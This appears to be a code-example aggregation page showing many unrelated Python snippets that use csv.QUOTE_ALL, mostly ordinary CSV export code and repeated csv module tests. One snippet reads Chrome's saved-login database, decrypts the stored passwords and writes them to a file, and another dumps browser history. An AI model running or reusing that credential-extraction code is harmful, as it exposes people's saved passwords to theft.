def create_carto_file():
""" Creates a .csv file to be uploaded into http://carto.com with the smells. """
location_finder = LocationFinder()
filename = "carto.csv"
csv_file = open(filename, "w", newline="")
print("Output file: {}".format(filename))
map_writer = csv.writer(csv_file, delimiter=",", quoting=csv.QUOTE_ALL)
map_writer.writerow(["longitude", "latitude", "date", "location_name", "number_of_smells"])
missing_locations = []
for borough_name, borough_information in smell_hits.res.items():
for year, number_of_smells in borough_information.items():
(latitude, longitude) = location_finder.lookup(borough_name)
if latitude is not None and longitude is not None:
date = "{}/01/01".format(year)
map_writer.writerow([latitude, longitude, date, borough_name, number_of_smells])
else:
if borough_name not in missing_locations:
missing_locations.append(borough_name)
print("Missing locations:", missing_locations)
python类QUOTE_ALL的实例源码
def clean_and_write_dataframe_to_csv(data, filename):
"""
Cleans a dataframe of np.NaNs and saves to file via pandas.to_csv
:param data: data to write to CSV
:type data: :class:`pandas.DataFrame`
:param filename: Path to file to write CSV to. if None, string of data
will be returned
:type filename: str | None
:return: If the filename is None, returns the string of data. Otherwise
returns None.
:rtype: str | None
"""
# cleans np.NaN values
data = data.where((pd.notnull(data)), None)
# If filename=None, to_csv will return a string
result = data.to_csv(path_or_buf=filename, encoding='utf-8', dtype=str, index=False, na_rep=None,
skipinitialspace=True, quoting=csv.QUOTE_ALL)
logging.info("Dataframe of shape %s has been stored." % str(data.shape))
return result
def LDParser(self):
conn = sqlite3.connect (os.getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
output_file_path = 'ChromeCode/ChromeLoginData'
with open(output_file_path, 'wb') as output_file:
csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
headers = []
csv_writer.writerow(headers)
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
if password:
print 'Site: ' + result[0]
print 'Username: ' + result[1]
print 'Password: ' + password
Final_list = (('Site', result[0]) + ("\n" 'Username', result[1]) + ("\n" 'Password', password))
csv_writer.writerow(Final_list)
def HistParser(self):
HistStatement = 'SELECT url FROM urls'
#Basic HistoryParser pulling only urls
with sqlite3.connect('C:\Users\Lewis Collins\AppData\Local\Google\Chrome\User Data\Default\History') as conn:
conn.text_factory = str
c = conn.cursor()
output_file_path = 'ChromeCode/Chrome_Hist.csv'
with open(output_file_path, 'wb') as output_file:
csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
headers = []
csv_writer.writerow(headers)
epoch = datetime(1601, 1, 1)
for row in (c.execute(HistStatement)):
row = list(row)
csv_writer.writerow(row)
def _test_arg_valid(self, ctor, arg):
self.assertRaises(TypeError, ctor)
# PyPy gets an AttributeError instead of a TypeError
self.assertRaises((TypeError, AttributeError), ctor, None)
self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
self.assertRaises(csv.Error, ctor, arg, 'foo')
self.assertRaises(TypeError, ctor, arg, delimiter=None)
self.assertRaises(TypeError, ctor, arg, delimiter=1)
self.assertRaises(TypeError, ctor, arg, quotechar=1)
self.assertRaises(TypeError, ctor, arg, lineterminator=None)
self.assertRaises(TypeError, ctor, arg, lineterminator=1)
self.assertRaises(TypeError, ctor, arg, quoting=None)
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar='')
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar=None)
def _test_dialect_attrs(self, ctor, *args):
# Now try with dialect-derived options
class dialect:
delimiter='-'
doublequote=False
escapechar='^'
lineterminator='$'
quotechar='#'
quoting=csv.QUOTE_ALL
skipinitialspace=True
strict=False
args = args + (dialect,)
obj = ctor(*args)
self.assertEqual(obj.dialect.delimiter, '-')
self.assertEqual(obj.dialect.doublequote, False)
self.assertEqual(obj.dialect.escapechar, '^')
self.assertEqual(obj.dialect.lineterminator, "$")
self.assertEqual(obj.dialect.quotechar, '#')
self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
self.assertEqual(obj.dialect.skipinitialspace, True)
self.assertEqual(obj.dialect.strict, False)
def test_quoting(self):
class mydialect(csv.Dialect):
delimiter = ";"
escapechar = '\\'
doublequote = False
skipinitialspace = True
lineterminator = '\r\n'
quoting = csv.QUOTE_NONE
d = mydialect()
mydialect.quoting = None
self.assertRaises(csv.Error, mydialect)
mydialect.doublequote = True
mydialect.quoting = csv.QUOTE_ALL
mydialect.quotechar = '"'
d = mydialect()
mydialect.quotechar = "''"
self.assertRaises(csv.Error, mydialect)
mydialect.quotechar = 4
self.assertRaises(csv.Error, mydialect)
def _test_arg_valid(self, ctor, arg):
self.assertRaises(TypeError, ctor)
self.assertRaises(TypeError, ctor, None)
self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
self.assertRaises(csv.Error, ctor, arg, 'foo')
self.assertRaises(TypeError, ctor, arg, delimiter=None)
self.assertRaises(TypeError, ctor, arg, delimiter=1)
self.assertRaises(TypeError, ctor, arg, quotechar=1)
self.assertRaises(TypeError, ctor, arg, lineterminator=None)
self.assertRaises(TypeError, ctor, arg, lineterminator=1)
self.assertRaises(TypeError, ctor, arg, quoting=None)
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar='')
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar=None)
def _test_dialect_attrs(self, ctor, *args):
# Now try with dialect-derived options
class dialect:
delimiter='-'
doublequote=False
escapechar='^'
lineterminator='$'
quotechar='#'
quoting=csv.QUOTE_ALL
skipinitialspace=True
strict=False
args = args + (dialect,)
obj = ctor(*args)
self.assertEqual(obj.dialect.delimiter, '-')
self.assertEqual(obj.dialect.doublequote, False)
self.assertEqual(obj.dialect.escapechar, '^')
self.assertEqual(obj.dialect.lineterminator, "$")
self.assertEqual(obj.dialect.quotechar, '#')
self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
self.assertEqual(obj.dialect.skipinitialspace, True)
self.assertEqual(obj.dialect.strict, False)
def _test_arg_valid(self, ctor, arg):
self.assertRaises(TypeError, ctor)
self.assertRaises(TypeError, ctor, None)
self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
self.assertRaises(csv.Error, ctor, arg, 'foo')
self.assertRaises(TypeError, ctor, arg, delimiter=None)
self.assertRaises(TypeError, ctor, arg, delimiter=1)
self.assertRaises(TypeError, ctor, arg, quotechar=1)
self.assertRaises(TypeError, ctor, arg, lineterminator=None)
self.assertRaises(TypeError, ctor, arg, lineterminator=1)
self.assertRaises(TypeError, ctor, arg, quoting=None)
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar='')
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar=None)
def _test_dialect_attrs(self, ctor, *args):
# Now try with dialect-derived options
class dialect:
delimiter='-'
doublequote=False
escapechar='^'
lineterminator='$'
quotechar='#'
quoting=csv.QUOTE_ALL
skipinitialspace=True
strict=False
args = args + (dialect,)
obj = ctor(*args)
self.assertEqual(obj.dialect.delimiter, '-')
self.assertEqual(obj.dialect.doublequote, False)
self.assertEqual(obj.dialect.escapechar, '^')
self.assertEqual(obj.dialect.lineterminator, "$")
self.assertEqual(obj.dialect.quotechar, '#')
self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
self.assertEqual(obj.dialect.skipinitialspace, True)
self.assertEqual(obj.dialect.strict, False)
def rm_source(identnr):
"""removes source with input identnr
:param identnr:
"""
source = get_sources(ident=str(identnr))
if source:
source_name = source[0][1]
else:
return False
path = CACHE_DIR + str(identnr) + "_" + source_name.replace(".", "") + '.json'
all_sources = _get_all_sources_as_list()
new = [x for x in all_sources if x[0] != identnr]
with open(SOURCE_FLE_NAME, 'w+') as csvfile:
sourcewriter = csv.writer(csvfile, delimiter=DELIMITER, quoting=csv.QUOTE_ALL)
for row in new:
sourcewriter.writerow(row)
if os.remove(path):
return True
else:
return False
def expand (self, db_schema, inc_tags=False, exc_tags=False,
out_pth=_TEMPLATE_PTH):
self.db_schema = db_schema
self.inc_tags, self.exc_tags = inc_tags, exc_tags
assert not (inc_tags and exc_tags), "cannot have included and excluded tags"
with open (out_pth, 'w') as out_hndl:
self.out_hndl = out_hndl
self.csv_writer = csv.DictWriter (out_hndl,
fieldnames=[x.value for x in consts.OUTPUT_COLS],
extrasaction='ignore',
quoting=csv.QUOTE_ALL,
)
self.csv_writer.writeheader()
for f in self.db_schema:
self.expand_form (f)
def _test_arg_valid(self, ctor, arg):
self.assertRaises(TypeError, ctor)
self.assertRaises(TypeError, ctor, None)
self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
self.assertRaises(csv.Error, ctor, arg, 'foo')
self.assertRaises(TypeError, ctor, arg, delimiter=None)
self.assertRaises(TypeError, ctor, arg, delimiter=1)
self.assertRaises(TypeError, ctor, arg, quotechar=1)
self.assertRaises(TypeError, ctor, arg, lineterminator=None)
self.assertRaises(TypeError, ctor, arg, lineterminator=1)
self.assertRaises(TypeError, ctor, arg, quoting=None)
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar='')
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar=None)
def _test_dialect_attrs(self, ctor, *args):
# Now try with dialect-derived options
class dialect:
delimiter='-'
doublequote=False
escapechar='^'
lineterminator='$'
quotechar='#'
quoting=csv.QUOTE_ALL
skipinitialspace=True
strict=False
args = args + (dialect,)
obj = ctor(*args)
self.assertEqual(obj.dialect.delimiter, '-')
self.assertEqual(obj.dialect.doublequote, False)
self.assertEqual(obj.dialect.escapechar, '^')
self.assertEqual(obj.dialect.lineterminator, "$")
self.assertEqual(obj.dialect.quotechar, '#')
self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
self.assertEqual(obj.dialect.skipinitialspace, True)
self.assertEqual(obj.dialect.strict, False)
def csv_masks(request, hashfile_id):
hashfile = get_object_or_404(Hashfile, id=hashfile_id)
# didn't found the correct way in pure django...
res = Cracked.objects.raw("SELECT id, password_mask, COUNT(*) AS count FROM Hashcat_cracked USE INDEX (hashfileid_id_index) WHERE hashfile_id=%s GROUP BY password_mask ORDER BY count DESC", [hashfile.id])
fp = tempfile.SpooledTemporaryFile(mode='w')
csvfile = csv.writer(fp, quotechar='"', quoting=csv.QUOTE_ALL)
for item in res:
csvfile.writerow([item.count, item.password_mask])
fp.seek(0) # rewind the file handle
csvfile_data = fp.read()
for query in connection.queries[-1:]:
print(query["sql"])
print(query["time"])
response = HttpResponse(csvfile_data, content_type='application/force-download') # mimetype is replaced by content_type for django 1.7
response['Content-Disposition'] = 'attachment; filename=%s_masks.csv' % hashfile.name
return response
def write_stock(stock_out, filtered_stock, modifications):
"""
Generate the new stock file with modified and created entries.
We mimick the initial stock with encoding, quotes and delimiters.
"""
with open(stock_out, 'w', encoding='cp1252') as csv_file:
_, first_row, fieldnames = next(filtered_stock)
# `extrasaction` is set to `ignore` to be able to pass more keys
# to the `writerow` method coming from the flux.
writer = csv.DictWriter(
csv_file, fieldnames=fieldnames, delimiter=';',
quoting=csv.QUOTE_ALL, extrasaction='ignore')
writer.writeheader()
# Because we already iterate once to retrieve fieldnames.
writer.writerow(first_row)
# Then write the updated stock.
for i, row, _ in filtered_stock:
writer.writerow(row)
# Finally, append creations and insertions.
for siret, row in modifications.items():
is_created = row['VMAJ'] == 'C'
is_inserted = row['VMAJ'] == 'D'
if is_created or is_inserted:
writer.writerow(row)
def write_stock(stock_out, filtered_stock):
"""
Generate the new stock file with filtered entries.
We mimick the initial stock with encoding, quotes and delimiters.
"""
with open(stock_out, 'w', encoding='cp1252') as csv_file:
_, first_row, fieldnames = next(filtered_stock)
# `extrasaction` is set to `ignore` to be able to pass more keys
# to the `writerow` method coming from the flux.
writer = csv.DictWriter(
csv_file, fieldnames=fieldnames, delimiter=';',
quoting=csv.QUOTE_ALL, extrasaction='ignore')
writer.writeheader()
# Because we already iterate once to retrieve fieldnames.
writer.writerow(first_row)
# Then write the updated stock.
for i, row, _ in filtered_stock:
writer.writerow(row)
def _test_arg_valid(self, ctor, arg):
self.assertRaises(TypeError, ctor)
# PyPy gets an AttributeError instead of a TypeError
self.assertRaises((TypeError, AttributeError), ctor, None)
self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
self.assertRaises(csv.Error, ctor, arg, 'foo')
self.assertRaises(TypeError, ctor, arg, delimiter=None)
self.assertRaises(TypeError, ctor, arg, delimiter=1)
self.assertRaises(TypeError, ctor, arg, quotechar=1)
self.assertRaises(TypeError, ctor, arg, lineterminator=None)
self.assertRaises(TypeError, ctor, arg, lineterminator=1)
self.assertRaises(TypeError, ctor, arg, quoting=None)
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar='')
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar=None)
def _test_dialect_attrs(self, ctor, *args):
# Now try with dialect-derived options
class dialect:
delimiter='-'
doublequote=False
escapechar='^'
lineterminator='$'
quotechar='#'
quoting=csv.QUOTE_ALL
skipinitialspace=True
strict=False
args = args + (dialect,)
obj = ctor(*args)
self.assertEqual(obj.dialect.delimiter, '-')
self.assertEqual(obj.dialect.doublequote, False)
self.assertEqual(obj.dialect.escapechar, '^')
self.assertEqual(obj.dialect.lineterminator, "$")
self.assertEqual(obj.dialect.quotechar, '#')
self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
self.assertEqual(obj.dialect.skipinitialspace, True)
self.assertEqual(obj.dialect.strict, False)
def run_rules(job_id, schema_name):
meta_conn = psycopg2.connect("dbname='validator' user='testUser' host='localhost' password='testPwd'")
meta_conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
meta_c = meta_conn.cursor()
meta_c.execute('UPDATE jobs SET status=\'starting_rules\' WHERE job_id=%d' % job_id)
conn = psycopg2.connect("dbname='job_%d' user='testUser' host='localhost' password='testPwd'" % job_id)
c = conn.cursor()
reader = csv.reader(open('rules/%s.csv' % schema_name, 'rb'), quotechar='"', delimiter=',',
quoting=csv.QUOTE_ALL, skipinitialspace=True)
header = reader.next()
for row in reader:
sql = row[header.index('sql')]
print "Running rule %s: %s" % (row[header.index('id')], sql)
c.execute(sql)
invalid_count = 0
for row in c.fetchall():
invalid_count += 1
print '==> Found %d invalid rows.' % invalid_count
conn.close()
meta_c.execute("UPDATE jobs SET status='finished_rules' WHERE job_id=%d" % job_id)
meta_conn.close()
def _test_arg_valid(self, ctor, arg):
self.assertRaises(TypeError, ctor)
self.assertRaises(TypeError, ctor, None)
self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
self.assertRaises(csv.Error, ctor, arg, 'foo')
self.assertRaises(TypeError, ctor, arg, delimiter=None)
self.assertRaises(TypeError, ctor, arg, delimiter=1)
self.assertRaises(TypeError, ctor, arg, quotechar=1)
self.assertRaises(TypeError, ctor, arg, lineterminator=None)
self.assertRaises(TypeError, ctor, arg, lineterminator=1)
self.assertRaises(TypeError, ctor, arg, quoting=None)
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar='')
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar=None)
def _test_dialect_attrs(self, ctor, *args):
# Now try with dialect-derived options
class dialect:
delimiter='-'
doublequote=False
escapechar='^'
lineterminator='$'
quotechar='#'
quoting=csv.QUOTE_ALL
skipinitialspace=True
strict=False
args = args + (dialect,)
obj = ctor(*args)
self.assertEqual(obj.dialect.delimiter, '-')
self.assertEqual(obj.dialect.doublequote, False)
self.assertEqual(obj.dialect.escapechar, '^')
self.assertEqual(obj.dialect.lineterminator, "$")
self.assertEqual(obj.dialect.quotechar, '#')
self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
self.assertEqual(obj.dialect.skipinitialspace, True)
self.assertEqual(obj.dialect.strict, False)
def _test_arg_valid(self, ctor, arg):
self.assertRaises(TypeError, ctor)
self.assertRaises(TypeError, ctor, None)
self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 0)
self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
self.assertRaises(csv.Error, ctor, arg, 'foo')
self.assertRaises(TypeError, ctor, arg, delimiter=None)
self.assertRaises(TypeError, ctor, arg, delimiter=1)
self.assertRaises(TypeError, ctor, arg, quotechar=1)
self.assertRaises(TypeError, ctor, arg, lineterminator=None)
self.assertRaises(TypeError, ctor, arg, lineterminator=1)
self.assertRaises(TypeError, ctor, arg, quoting=None)
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar='')
self.assertRaises(TypeError, ctor, arg,
quoting=csv.QUOTE_ALL, quotechar=None)
def _test_dialect_attrs(self, ctor, *args):
# Now try with dialect-derived options
class dialect:
delimiter='-'
doublequote=False
escapechar='^'
lineterminator='$'
quotechar='#'
quoting=csv.QUOTE_ALL
skipinitialspace=True
strict=False
args = args + (dialect,)
obj = ctor(*args)
self.assertEqual(obj.dialect.delimiter, '-')
self.assertEqual(obj.dialect.doublequote, False)
self.assertEqual(obj.dialect.escapechar, '^')
self.assertEqual(obj.dialect.lineterminator, "$")
self.assertEqual(obj.dialect.quotechar, '#')
self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
self.assertEqual(obj.dialect.skipinitialspace, True)
self.assertEqual(obj.dialect.strict, False)
def score_packets(input_url='data/raw_packets.csv', output_url='data/scored_packets.csv'):
'''
Adds score indicators to botnets
'''
print("Transforming initial data csv")
with open(output_url, 'w') as raw_flows:
writer = csv.writer(raw_flows, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
with open(input_url) as csvfile:
writer.writerow(headers + "Score")
first = True
for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
if first is True:
first = False
continue
if row[headers.index('Label')] == "BENIGN":
row.append(0)
else:
row.append(1)
writer.writerow(row)
def modify_csv_rows(input_url=PROJ_ROOT+'data/data.csv', output_url=PROJ_ROOT+'data/modified_data.csv'):
print("Transforming initial data csv")
with open(output_url, 'w') as new:
newWriter = csv.writer(new, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
with open(input_url) as csvfile:
newWriter.writerow(['Source Port', 'Destination Port', 'Eth', 'Source', 'Destination', 'Protocol', 'IP_Flags', 'Length', 'Protocols in frame', 'Time', 'tcp_Flags', 'TCP Segment Len', 'udp_Length'])
first = True
for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
if first == True:
first = False
continue
if row[2]:
row.pop(0)
row.pop(0)
else:
row.pop(2)
row.pop(2)
newWriter.writerow(row)
print("Csv row modification complete\n##############################")
def test_csv_export(rf, module):
class CSVExport(views.AbstractCSVExportView):
def get_filename(self):
return 'testexport.csv'
def get_header(self):
return ['head1', 'head2']
def export_rows(self):
return [['regular', 'delimiter,;\t '],
['escaping"\'', 'newlines\r\n']]
request = rf.get('/')
response = CSVExport.as_view()(request, module=module)
assert response['Content-Disposition'] == 'attachment; ' \
'filename="testexport.csv"'
reader = csv.reader(response.content.decode('utf-8').splitlines(True),
lineterminator='\n', quotechar='"',
quoting=csv.QUOTE_ALL)
lines = list(reader)
assert lines[0] == ['head1', 'head2']
assert lines[1] == ['regular', 'delimiter,;\t ']
assert lines[2] == ['escaping"\'', 'newlines\r\n']
def main():
parser = make_arg_parser()
args = parser.parse_args()
sam_files = [os.path.join(args.input, filename) for filename in os.listdir(args.input) if filename.endswith('.sam')]
img_map = IMGMap()
ncbi_tree = NCBITree()
with open(args.output, 'w') if args.output else sys.stdout as outf:
csv_outf = csv.writer(outf, quoting=csv.QUOTE_ALL, lineterminator='\n')
csv_outf.writerow(['sample_id', 'sequence_id', 'ncbi_tid', 'img_id'])
for file in sam_files:
with open(file) as inf:
lca_map = build_lca_map(yield_alignments_from_sam_inf(inf), ncbi_tree, img_map)
for key in lca_map:
img_ids, ncbi_tid = lca_map[key]
csv_outf.writerow([os.path.basename(file)[:-4], key, ncbi_tid, ','.join(img_ids)])
def get(self):
cached = memcache.get('best_handler')
if cached:
self.response.out.write(cached)
else:
response_writer = csv.writer(
self.response, delimiter=',', quoting=csv.QUOTE_ALL)
# Instruct endpoint to cache for 1 day.
self.response.headers['Cache-control'] = 'public, max-age=86400'
for line in ndb.gql(
'select distinct screen_name, twitter_id, score '
'from Score order by score limit 20000'):
response_writer.writerow(
[line.screen_name, line.twitter_id, line.score])
memcache.set('best_handler', self.response.text, 86400)